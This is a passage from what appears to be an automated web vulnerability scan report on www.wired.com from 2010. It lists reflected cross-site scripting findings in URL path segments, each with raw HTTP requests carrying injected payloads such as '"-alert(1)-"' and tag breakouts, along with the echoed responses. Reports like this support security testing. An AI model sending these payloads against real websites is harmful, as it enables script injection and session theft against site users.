The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a40"><a>d195687ec69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicesd2a40"><a>d195687ec69/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29357
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:12:27 GMT
Date: Mon, 22 Nov 2010 01:08:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicesd2a40"><a>d195687ec69 ss_corrections">
...[SNIP]...

1.770. http://www.wired.com/services/corrections/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20746"><a>2a57fa204b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/corrections20746"><a>2a57fa204b8/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29357
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_corrections20746"><a>2a57fa204b8">
...[SNIP]...

1.771. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe3c"><a>0650befcdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicesabe3c"><a>0650befcdcc/email/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29317
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:18:42 GMT
Date: Sun, 21 Nov 2010 22:08:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicesabe3c"><a>0650befcdcc ss_email c_culture">
...[SNIP]...

1.772. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c62"><a>f4dab07ffe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/email99c62"><a>f4dab07ffe9/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29317
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:19:04 GMT
Date: Sun, 21 Nov 2010 22:09:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_email99c62"><a>f4dab07ffe9 c_culture">
...[SNIP]...

1.773. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c7bc"-alert(1)-"baa07cebf20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture8c7bc"-alert(1)-"baa07cebf20/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:31 GMT
Date: Sun, 21 Nov 2010 22:09:31 GMT
Content-Length: 32230
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "2008","multimedia","art","email","services","gallery_faves_food","07","culture8c7bc"-alert(1)-"baa07cebf20"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.774. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f88b"><a>d314e13f6a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/email/culture4f88b"><a>d314e13f6a1/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:24 GMT
Date: Sun, 21 Nov 2010 22:09:24 GMT
Content-Length: 32216
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<body class="s_services ss_email c_culture4f88b"><a>d314e13f6a1">
...[SNIP]...

1.775. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f26"-alert(1)-"7b4c9190c10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture/art69f26"-alert(1)-"7b4c9190c10/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:32 GMT
Date: Sun, 21 Nov 2010 22:09:32 GMT
Content-Length: 32202
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "2008","multimedia","email","services","gallery_faves_food","culture","07","art69f26"-alert(1)-"7b4c9190c10"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.776. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"e70c417b07a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture/art/multimedia8fa5c"-alert(1)-"e70c417b07a/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:33 GMT
Date: Sun, 21 Nov 2010 22:09:33 GMT
Content-Length: 32202
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "multimedia8fa5c"-alert(1)-"e70c417b07a","2008","art","email","services","gallery_faves_food","culture","07"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.777. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b056b"-alert(1)-"94be61696de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture/art/multimedia/2008b056b"-alert(1)-"94be61696de/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 21 Nov 2010 22:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:09:34 GMT
Content-Length: 32202
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "multimedia","art","email","services","gallery_faves_food","culture","2008b056b"-alert(1)-"94be61696de","07"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.778. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53a9b"-alert(1)-"71d40f0ea48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture/art/multimedia/2008/0753a9b"-alert(1)-"71d40f0ea48/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:35 GMT
Date: Sun, 21 Nov 2010 22:09:35 GMT
Content-Length: 32202
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "0753a9b"-alert(1)-"71d40f0ea48","2008","multimedia","art","email","services","gallery_faves_food","culture"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.779. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/email/culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a570b"-alert(1)-"e4737c8dafd was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/email/culture/art/multimedia/2008/07/gallery_faves_fooda570b"-alert(1)-"e4737c8dafd HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 21 Nov 2010 22:09:36 GMT
Date: Sun, 21 Nov 2010 22:09:36 GMT
Content-Length: 32202
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'services;', kws:[ "2008","multimedia","art","email","services","culture","gallery_faves_fooda570b"-alert(1)-"e4737c8dafd","07"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.780. http://www.wired.com/services/faq/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/faq/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb7b"><a>7ab8294467e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services3bb7b"><a>7ab8294467e/faq/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29341
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:53 GMT
Date: Mon, 22 Nov 2010 01:08:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services3bb7b"><a>7ab8294467e ss_faq">
...[SNIP]...

1.781. http://www.wired.com/services/faq/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/faq/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a2bc"><a>d55232de10d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/faq1a2bc"><a>d55232de10d/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29341
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_faq1a2bc"><a>d55232de10d">
...[SNIP]...

1.782. http://www.wired.com/services/feedback/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/general

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abf1"><a>5ce90c983a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services6abf1"><a>5ce90c983a8/feedback/general HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29368
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Mon, 22 Nov 2010 01:12:54 GMT
Date: Mon, 22 Nov 2010 01:09:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services6abf1"><a>5ce90c983a8 ss_feedback c_general">
...[SNIP]...

1.783. http://www.wired.com/services/feedback/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/general

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 974da"><a>72d8e369572 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/feedback974da"><a>72d8e369572/general HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29368
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
